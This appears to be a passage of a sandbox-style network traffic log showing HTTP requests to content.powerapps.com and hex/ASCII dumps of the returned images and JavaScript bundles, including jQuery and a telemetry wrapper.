2025-01-15 14:11:55 UTC	15296	IN	Data Raw: b7 a8 b8 65 b3 4a 5b ba 7a 1a 67 29 60 01 19 91 9c 02 16 85 ab c8 4e 81 3e 57 19 bf 08 58 6b f5 92 0f 01 85 7f 0d 51 b8 4a f2 01 f0 d6 15 83 29 90 44 7e 3e af 5c 4d ad 72 d5 d5 ca 55 55 2b 57 53 2d bf aa 5a c6 f3 08 27 8e ef 23 97 97 9f cb 2b 5f f7 be 91 35 08 54 da d2 a9 62 e7 7b fe e3 51 c1 02 b2 c1 fd 02 16 7d ae 22 3b 7c fa 5c 65 7c b1 c4 5a ab 8c 8c 08 29 fc eb 88 3e 57 49 3d 08 0a 57 0c a8 40 52 bc 53 ac aa ad 55 be a6 46 f9 9a 3a 79 79 7e 91 5d 12 18 cf db fa dd d5 d4 be fb 2f ef ad c5 4b 56 4b 7a 4c 32 0f 1a 05 0f 96 ac 1e 5c fe da 8b 4f a8 a3 23 20 35 20 3d dc 1e a9 79 eb 2a b2 c3 67 bb 60 86 2f 04 d6 59 65 64 44 48 e1 5f 47 bc 75 95 d4 03 a0 70 c5 80 0a b8 cc cb e7 94 af a9 53 be ae 4e f9 da 3a e5 6b 6a 64 7c 9f 60 d2 a7 59 d2 81 92 3d d0 ca c8 Data Ascii: eJ[zg)`N>WXkQJ)D~>\MrUU+WS-Z'#+_5Tb{Q}";\|\e\|Z)>WI=W@RSUF:yy~]/KVKzL2\O# 5 =y*g`/YedDH_GupSN:kjd\|`Y=
2025-01-15 14:11:55 UTC	15296	IN	Data Raw: 00 47 0f bb fc f2 c1 95 fa 3c 0a 58 15 99 9c b2 5d 30 c9 07 f0 e3 c7 9f e4 1e 08 59 6b 4d b5 2e f9 d4 c7 75 fb 17 3e a7 dd 86 0e 61 b0 c9 d4 50 42 9f ab 6d 7e c1 f4 b9 2a fb f0 d2 7d 3f 52 d5 07 00 00 a9 95 37 45 ff 0b 95 fa b0 6c 17 b0 28 5c 25 e4 14 6d a8 a7 f6 97 a5 af ea c5 b5 6b 19 5a 22 f0 b1 31 a3 f5 c0 97 4f d3 b5 9f fd b4 c6 36 35 65 70 c0 89 fc 32 8f f9 94 29 5c f5 f8 05 d3 e7 ca 81 e7 8d 0b f7 23 85 2b 00 00 90 01 46 14 b0 c2 9e bb 46 f0 01 ee e7 63 d3 79 10 ef ff 54 2b e9 ba 27 d8 46 18 dd f8 25 1d 3f 65 92 1e 3d eb 4b 9a 77 f8 a1 6a af af 57 a6 6f 26 fa 5c 85 9f bb 75 e8 38 e8 73 15 f3 3d e0 4a 9f 2b 0a 57 00 00 20 33 eb bf 7d 47 2c 5a b2 63 25 3e 2b 7b 05 2c de ba ea f7 1a 23 41 5f 52 9f 3f f5 8a 87 1f 55 60 59 50 44 a9 26 97 d3 ac 7d f6 d4 Data Ascii: G<X]0YkM.u>aPBm~*}?R7El(\%mkZ"1O65ep2)\#+FFcyT+'F%?e=KwjWo&\u8s=J+W 3}G,Zc%>+{,#A_R?U`YPD&}
2025-01-15 14:11:55 UTC	15296	IN	Data Raw: bb e5 e7 ba 79 cb a3 4a cb 76 41 0a 57 61 0f c7 76 41 20 6a 7e 36 ab ce 99 b3 d5 3a 79 aa 0e ed ed d6 c0 a1 5e 92 02 00 48 ae 82 60 83 9f 95 f3 f3 5e 78 b3 b2 3a 2c 5e 59 57 b6 0b da 92 de 82 c8 63 28 e3 74 88 25 8e 44 63 01 f0 52 ff f0 eb bb f5 f9 75 1b 54 f5 aa ab d0 8a 46 49 17 af 42 7a 31 55 0f 13 f2 76 41 9b e8 1b 5b c5 90 11 de 2c ca 1a 9a 1b 16 e2 91 c9 e5 34 e5 e4 b9 9a 71 fa 59 ca 35 35 93 10 00 40 ec 8c cc d3 5d ab ae 7d ac 9c 3f 13 42 01 ab 84 c2 55 ea e6 63 d6 81 26 ed 2f 49 ac 2b ab ae 28 5c 01 18 c5 ff 77 ef 5a 7d e8 17 bf ac fc 43 e9 58 e1 2a 1d 4d da 43 be 48 d6 6c e1 2a c2 9b 68 d9 85 2b 6e 5a 88 5f ae a9 59 33 4e 3f 4b 93 4f 3e 45 7e 26 4b 42 00 00 f1 31 f6 27 e5 fe 91 2a b6 10 b2 5d 30 d1 38 12 cf 31 7d ae 00 4c ec 1f ef be 57 1f f8 f9 Data Ascii: yJvAWavA j~6:y^H`^x:,^YWc(t%DcRuTFIBz1UvA[,4qY55@]}?BUc&/I+(\wZ}CXMCHlh+nZ_Y3N?KO>E~&KB1'*]081}LW
2025-01-15 14:11:55 UTC	9791	IN	Data Raw: 69 a4 00 00 e0 02 9b 1f 99 4a 16 50 93 3c ef 68 c3 f6 98 7a 5e 79 b9 9c b2 d3 a6 d7 d4 8a 26 0a 58 40 32 d8 42 88 18 3c 65 ad fd cb ae 1b af f9 01 a9 40 e4 73 20 52 00 00 48 da ab ef d8 dc 5a 1c 1e 6e 22 13 a8 35 26 9b 55 76 f2 94 d8 8a 57 7e 73 8b 72 d3 67 d4 dc 76 3c 0a 58 40 32 fc 0c 05 2c 44 e6 a0 ac 3e d0 3c 78 68 5e 37 c5 2b c4 84 d9 04 00 20 71 47 0e 75 9d 16 0c 0d 91 08 d4 14 af b9 59 99 b6 f6 98 0e 66 94 ed e8 94 df da 56 9b b9 62 1b 13 90 cc c3 5e 8e cf 1e 42 97 37 32 5f 2d 14 f4 a1 3d ef 58 be 97 74 20 d6 6b 1a 29 00 00 24 3e 13 ea da 75 9a 2d 16 49 04 6a 83 67 94 69 ef 88 af 59 7b 36 ab dc 94 a9 b5 d1 ac 7d b4 f8 33 59 c9 18 ce 1b 20 89 cb 95 cf e3 1e 42 64 ed cd 46 e6 2f 77 dd b8 fc 09 92 81 24 70 45 03 00 24 2e 1f 0c 9f a4 80 02 16 6a e0 61 Data Ascii: iJP<hz^y&X@2B<e@s RHZn"5&UvW~srgv<X@2,D><xh^7+ qGuYfVb^B72_-=Xt k)$>u-IjgiY{6}3Y BdF/w$pE$.ja

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:11:58 UTC	381	OUT	GET /resource/powerappsportal/img/web.png HTTP/1.1 Host: content.powerapps.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:11:58 UTC	785	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:11:58 GMT Content-Type: image/png Content-Length: 625 Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000 Strict-Transport-Security: max-age=31536000; includeSubDomains x-ms-islandgateway: GA00000HN x-ms-static-content: NR0000007 Timing-Allow-Origin: * X-ServiceFabric: NoRetry x-ms-service-request-id: 0621a9c1-54bf-43c8-b2a6-1f817f6162f4 x-ms-correlation-id: 0fac1554-84d9-4044-b90c-ed96b040fc99 x-ms-activity-vector: 00.01.00 Server-Timing: x-ms-igw-upstream-headers;dur=7.1,x-ms-igw-req-overhead;dur=0.3 X-Content-Type-Options: nosniff x-azure-ref: 20250115T141158Z-1848b945c76x7snshC1MNZm83800000001ag00000000cpy1 X-Cache: TCP_MISS x-fd-int-roxy-purgeid: 0 Accept-Ranges: bytes
2025-01-15 14:11:58 UTC	625	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 02 06 49 44 41 54 78 01 9d 52 d1 71 da 40 10 dd 3d 0b 0b f2 65 3a c0 15 44 74 80 2b 80 74 80 2b 40 9e 20 23 e7 27 e4 c3 41 18 7b 2c 55 80 5d 41 70 05 38 15 84 54 00 a9 20 fe 33 42 a0 cd db b3 95 c1 cc c4 33 f1 cd dc cc ed bb dd b7 bb 6f 97 69 e7 84 dd 6e 83 f7 4c 13 cf 16 91 d4 9e e1 19 e3 e6 9c 7d 89 a2 78 b1 ed cf c5 c3 f7 fd 83 8a bb ff 19 41 6d 98 70 e2 03 61 73 64 9d 24 9f 02 57 4c 09 27 83 e1 c5 49 11 67 8a 47 c5 2d 4d 85 f3 ea 63 9a 1d c2 b4 c1 51 14 2d f4 02 3f 06 e6 b9 e9 aa 2e b4 e1 b3 5e f0 43 Data Ascii: PNGIHDRapHYssRGBgAMAaIDATxRq@=e:Dt+t+@ #'A{,U]Ap8T 3B3oinL}xAmpasd$WL'IgG-McQ-?.^C

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:11:58 UTC	383	OUT	GET /resource/powerappsportal/img/close.png HTTP/1.1 Host: content.powerapps.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:11:58 UTC	813	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:11:58 GMT Content-Type: image/png Content-Length: 237 Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000 Strict-Transport-Security: max-age=31536000; includeSubDomains x-ms-islandgateway: GA00000JX x-ms-static-content: ZE000005G Timing-Allow-Origin: * X-ServiceFabric: NoRetry x-ms-service-request-id: a3c61a82-8fb3-49fb-8645-e085971704d7 x-ms-correlation-id: 3d2702d8-f1ce-4122-923d-27dfb7944132 x-ms-activity-vector: 00.01.00 Server-Timing: x-ms-igw-upstream-headers;dur=26.9,x-ms-igw-req-overhead;dur=0.3 X-Content-Type-Options: nosniff x-azure-ref: 20250115T141158Z-17f859c6f6b7mmkbhC1MNZg7ks000000011g00000000bgn2 X-Cache: TCP_REMOTE_HIT x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 Accept-Ranges: bytes
2025-01-15 14:11:58 UTC	237	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0a 00 00 00 0a 08 06 00 00 00 8d 32 cf bd 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 82 49 44 41 54 78 01 8d 8f c1 0d 80 20 10 04 17 28 c2 8b 2f 4b 20 76 64 07 96 a0 1d d8 81 b5 d8 01 76 e0 93 a7 15 a0 ae 09 09 21 f7 60 3f 70 b7 c3 ed e1 c6 d1 ef 5d 27 67 8c f1 86 22 ef fd d0 8b 2c 36 25 ac c6 60 67 43 83 e8 25 60 73 9c 24 22 07 1b 3c f3 e4 0c 3d 0f a6 10 c2 65 ea d7 34 58 97 d0 5f 6b 51 bc 97 10 65 d1 a8 e6 68 a7 2d ae 7d d0 d4 90 b6 33 3d fb 65 2f 1a 44 b1 f7 43 c0 fc 02 da 6f 62 34 31 b0 78 b4 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDR2pHYssRGBgAMAaIDATx (/K vdv!`?p]'g",6%`gC%`s$"<=e4X_kQeh-}3=e/DCob41xIENDB`

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:11:59 UTC	420	OUT	GET /resource/powerappsportal/dist/client-telemetry-wrapper.bundle-633e70f51b.js HTTP/1.1 Host: content.powerapps.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:11:59 UTC	852	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:11:59 GMT Content-Type: application/x-javascript Content-Length: 4807 Connection: close Vary: Accept-Encoding Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000 Strict-Transport-Security: max-age=31536000; includeSubDomains x-ms-islandgateway: GA00000K0 x-ms-static-content: ZE000005G Timing-Allow-Origin: * X-ServiceFabric: NoRetry x-ms-service-request-id: 9bf653d3-eade-41b6-be79-1de4939dce90 x-ms-correlation-id: 4e2fe58d-76e2-4ad5-aaea-a3d6d773ac29 x-ms-activity-vector: 00.01.00 Server-Timing: x-ms-igw-upstream-headers;dur=10.4,x-ms-igw-req-overhead;dur=0.3 X-Content-Type-Options: nosniff x-azure-ref: 20250115T141159Z-1848b945c76qk2l6hC1MNZncb800000000ng000000004enz X-Cache: TCP_REMOTE_HIT x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 Accept-Ranges: bytes
2025-01-15 14:11:59 UTC	4807	IN	Data Raw: ef bb bf 2f 2f 2f 2f 20 57 72 61 70 70 65 72 20 63 6c 61 73 73 20 66 6f 72 20 63 6c 69 65 6e 74 20 6c 6f 67 67 65 72 20 66 6f 72 20 62 65 6c 6f 77 20 70 75 72 70 6f 73 65 73 0d 0a 2f 2f 2f 2f 20 31 2e 20 41 62 73 74 72 61 63 74 69 6e 67 20 43 53 54 20 66 72 61 6d 65 77 6f 72 6b 20 63 6f 64 65 20 66 72 6f 6d 20 6d 61 6e 75 61 6c 20 74 72 61 63 65 20 6c 6f 67 20 41 50 49 73 2e 20 0d 0a 2f 2f 2f 2f 20 32 2e 20 43 6f 6e 73 74 72 6f 6c 6c 69 6e 67 20 69 6e 73 74 61 6e 74 69 61 74 69 6f 6e 20 6f 66 20 43 53 54 20 66 72 61 6d 65 77 6f 72 6b 20 63 6f 64 65 20 69 6e 20 63 6c 69 65 6e 74 4c 6f 67 67 65 72 2e 6a 73 20 62 61 73 65 64 20 6f 6e 20 77 68 65 74 68 65 72 20 74 65 6c 65 6d 65 74 72 79 20 69 73 20 65 6e 61 62 6c 65 64 0d 0a 63 6c 61 73 73 20 43 6c 69 65 6e Data Ascii: //// Wrapper class for client logger for below purposes//// 1. Abstracting CST framework code from manual trace log APIs. //// 2. Constrolling instantiation of CST framework code in clientLogger.js based on whether telemetry is enabledclass Clien

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:11:59 UTC	410	OUT	GET /resource/powerappsportal/dist/pcf-dependency.bundle-805a1661b7.js HTTP/1.1 Host: content.powerapps.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:11:59 UTC	826	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:11:59 GMT Content-Type: application/x-javascript Content-Length: 43107 Connection: close Vary: Accept-Encoding Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000 Strict-Transport-Security: max-age=31536000; includeSubDomains x-ms-islandgateway: GA00000JV x-ms-static-content: ZE00000B6 Timing-Allow-Origin: * X-ServiceFabric: NoRetry x-ms-service-request-id: 07c40486-08cc-4a40-8b90-e0acc5eb1a32 x-ms-correlation-id: e323e457-c40e-4b3c-bb39-cc9819d1d08a x-ms-activity-vector: 00.01.00 Server-Timing: x-ms-igw-upstream-headers;dur=12.3,x-ms-igw-req-overhead;dur=0.3 X-Content-Type-Options: nosniff x-azure-ref: 20250115T141159Z-1848b945c76gcx6dhC1MNZgyxg00000001dg000000006xpq X-Cache: TCP_MISS x-fd-int-roxy-purgeid: 0 Accept-Ranges: bytes
2025-01-15 14:11:59 UTC	15558	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 7d 65 6c 73 65 20 69 66 28 74 79 70 65 6f 66 20 64 65 66 69 6e 65 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 64 65 66 69 6e 65 2e 61 6d 64 29 7b 64 65 66 69 6e 65 28 5b 5d 2c 65 29 7d 65 6c 73 65 7b 76 61 72 20 74 3b 69 66 28 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 74 3d 77 69 6e 64 6f 77 7d 65 6c 73 65 20 69 66 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 74 3d 67 6c 6f 62 61 6c 7d 65 6c 73 65 20 Data Ascii: (function(e){if(typeof exports==="object"&&typeof module!=="undefined"){module.exports=e()}else if(typeof define==="function"&&define.amd){define([],e)}else{var t;if(typeof window!=="undefined"){t=window}else if(typeof global!=="undefined"){t=global}else
2025-01-15 14:11:59 UTC	16384	IN	Data Raw: 72 72 61 79 28 74 3e 31 3f 74 2d 31 3a 30 29 2c 6e 3d 31 3b 6e 3c 74 3b 6e 2b 2b 29 7b 72 5b 6e 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 7d 76 61 72 20 6f 3d 30 3b 76 61 72 20 69 3d 22 57 61 72 6e 69 6e 67 3a 20 22 2b 65 2e 72 65 70 6c 61 63 65 28 2f 25 73 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 5b 6f 2b 2b 5d 7d 29 3b 69 66 28 74 79 70 65 6f 66 20 63 6f 6e 73 6f 6c 65 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 69 29 7d 74 72 79 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 69 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 3b 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 74 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 60 6c Data Ascii: rray(t>1?t-1:0),n=1;n<t;n++){r[n-1]=arguments[n]}var o=0;var i="Warning: "+e.replace(/%s/g,function(){return r[o++]});if(typeof console!=="undefined"){console.warn(i)}try{throw new Error(i)}catch(e){}};r=function(e,t){if(t===undefined){throw new Error("`l
2025-01-15 14:11:59 UTC	11165	IN	Data Raw: 20 65 7d 29 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 5f 5f 73 70 72 65 61 64 41 72 72 61 79 3d 74 68 69 73 26 26 74 68 69 73 2e 5f 5f 73 70 72 65 61 64 41 72 72 61 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 69 66 28 72 7c 7c 32 3d 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 66 6f 72 28 76 61 72 20 6e 2c 6f 3d 30 2c 69 3d 74 2e 6c 65 6e 67 74 68 3b 6f 3c 69 3b 6f 2b 2b 29 21 6e 26 26 6f 20 69 6e 20 74 7c 7c 28 28 6e 3d 6e 7c 7c 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 2c 30 2c 6f 29 29 5b 6f 5d 3d 74 5b 6f 5d 29 3b 72 65 74 75 72 6e 20 65 2e 63 6f 6e 63 61 74 28 6e 7c 7c 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 29 Data Ascii: e}).apply(this,arguments)},__spreadArray=this&&this.__spreadArray\|\|function(e,t,r){if(r\|\|2===arguments.length)for(var n,o=0,i=t.length;o<i;o++)!n&&o in t\|\|((n=n\|\|Array.prototype.slice.call(t,0,o))[o]=t[o]);return e.concat(n\|\|Array.prototype.slice.call(t)

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:11:59 UTC	429	OUT	GET /resource/powerappsportal/dist/preform.BootstrapV5.moment_2_29_4.bundle-cf8e0fd942.js HTTP/1.1 Host: content.powerapps.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:11:59 UTC	854	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:11:59 GMT Content-Type: application/x-javascript Content-Length: 540048 Connection: close Vary: Accept-Encoding Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000 Strict-Transport-Security: max-age=31536000; includeSubDomains x-ms-islandgateway: GA000000Z x-ms-static-content: NR000000S Timing-Allow-Origin: * X-ServiceFabric: NoRetry x-ms-service-request-id: 3dc9b523-4028-4042-bd8d-cb62865f3f28 x-ms-correlation-id: 9fa8f4b3-07af-4a01-9cab-a18f08a8f134 x-ms-activity-vector: 00.01.00 Server-Timing: x-ms-igw-upstream-headers;dur=32.0,x-ms-igw-req-overhead;dur=0.3 X-Content-Type-Options: nosniff x-azure-ref: 20250115T141159Z-1848b945c76khrqwhC1MNZunx000000000pg000000008s48 X-Cache: TCP_REMOTE_HIT x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 Accept-Ranges: bytes
2025-01-15 14:11:59 UTC	15530	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 32 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 Data Ascii: /! jQuery v3.6.2 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
2025-01-15 14:11:59 UTC	16384	IN	Data Raw: 7c 24 29 22 29 29 26 26 79 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 74 65 73 74 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 2e 63 6c 61 73 73 4e 61 6d 65 26 26 65 2e 63 6c 61 73 73 4e 61 6d 65 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 63 6c 61 73 73 22 29 7c 7c 22 22 29 7d 29 7d 2c 41 54 54 52 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 2c 73 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 61 65 2e 61 74 74 72 28 65 2c 69 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 22 21 3d 22 3d 3d 3d 6e 3a 21 6e 7c 7c 28 74 2b 3d 22 22 2c 22 3d 22 3d 3d 3d 6e 3f 74 3d 3d 3d Data Ascii: \|$)"))&&y(e,function(e){return t.test("string"==typeof e.className&&e.className\|\|"undefined"!=typeof e.getAttribute&&e.getAttribute("class")\|\|"")})},ATTR:function(i,n,s){return function(e){var t=ae.attr(e,i);return null==t?"!="===n:!n\|\|(t+="","="===n?t===
2025-01-15 14:11:59 UTC	16384	IN	Data Raw: 65 26 26 4c 2e 74 65 73 74 28 65 2e 6e 61 6d 65 29 26 26 6b 2e 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 6a 51 75 65 72 79 2e 44 65 66 65 72 72 65 64 20 65 78 63 65 70 74 69 6f 6e 3a 20 22 2b 65 2e 6d 65 73 73 61 67 65 2c 65 2e 73 74 61 63 6b 2c 74 29 7d 2c 43 2e 72 65 61 64 79 45 78 63 65 70 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6b 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 65 7d 29 7d 3b 76 61 72 20 57 3d 43 2e 44 65 66 65 72 72 65 64 28 29 3b 66 75 6e 63 74 69 6f 6e 20 59 28 29 7b 44 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 59 29 2c 6b 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c Data Ascii: e&&L.test(e.name)&&k.console.warn("jQuery.Deferred exception: "+e.message,e.stack,t)},C.readyException=function(e){k.setTimeout(function(){throw e})};var W=C.Deferred();function Y(){D.removeEventListener("DOMContentLoaded",Y),k.removeEventListener("load",
2025-01-15 14:11:59 UTC	16384	IN	Data Raw: 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 74 29 2c 74 7c 7c 72 29 29 7b 66 6f 72 28 61 3d 28 6f 3d 43 2e 6d 61 70 28 67 65 28 65 2c 22 73 63 72 69 70 74 22 29 2c 49 65 29 29 2e 6c 65 6e 67 74 68 3b 68 3c 63 3b 68 2b 2b 29 6c 3d 65 2c 68 21 3d 3d 64 26 26 28 6c 3d 43 2e 63 6c 6f 6e 65 28 6c 2c 21 30 2c 21 30 29 2c 61 26 26 43 2e 6d 65 72 67 65 28 6f 2c 67 65 28 6c 2c 22 73 63 72 69 70 74 22 29 29 29 2c 73 2e 63 61 6c 6c 28 69 5b 68 5d 2c 6c 2c 68 29 3b 69 66 28 61 29 66 6f 72 28 75 3d 6f 5b 6f 2e 6c 65 6e 67 74 68 2d 31 5d 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2c 43 2e 6d 61 70 28 6f 2c 4f 65 29 2c 68 3d 30 3b 68 3c 61 3b 68 2b 2b 29 6c 3d 6f 5b 68 5d 2c 66 65 2e 74 65 73 74 28 6c 2e 74 79 70 65 7c 7c 22 22 29 26 26 21 47 2e 61 63 Data Ascii: hildNodes.length&&(e=t),t\|\|r)){for(a=(o=C.map(ge(e,"script"),Ie)).length;h<c;h++)l=e,h!==d&&(l=C.clone(l,!0,!0),a&&C.merge(o,ge(l,"script"))),s.call(i[h],l,h);if(a)for(u=o[o.length-1].ownerDocument,C.map(o,Oe),h=0;h<a;h++)l=o[h],fe.test(l.type\|\|"")&&!G.ac
2025-01-15 14:11:59 UTC	16384	IN	Data Raw: 2c 74 2c 69 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 7c 7c 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 65 3f 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 3a 74 68 69 73 2e 61 6e 69 6d 61 74 65 28 75 74 28 6e 2c 21 30 29 2c 65 2c 74 2c 69 29 7d 7d 29 2c 43 2e 65 61 63 68 28 7b 73 6c 69 64 65 44 6f 77 6e 3a 75 74 28 22 73 68 6f 77 22 29 2c 73 6c 69 64 65 55 70 3a 75 74 28 22 68 69 64 65 22 29 2c 73 6c 69 64 65 54 6f 67 67 6c 65 3a 75 74 28 22 74 6f 67 67 6c 65 22 29 2c 66 61 64 65 49 6e 3a 7b 6f 70 61 63 69 74 79 3a 22 73 68 6f 77 22 7d 2c 66 61 64 65 4f 75 74 3a 7b 6f 70 61 63 69 74 79 3a 22 68 69 64 65 22 7d 2c 66 61 64 65 54 6f 67 67 6c 65 3a 7b 6f 70 61 63 69 74 79 3a 22 74 6f 67 67 6c 65 22 7d 7d 2c 66 75 6e 63 Data Ascii: ,t,i){return null==e\|\|"boolean"==typeof 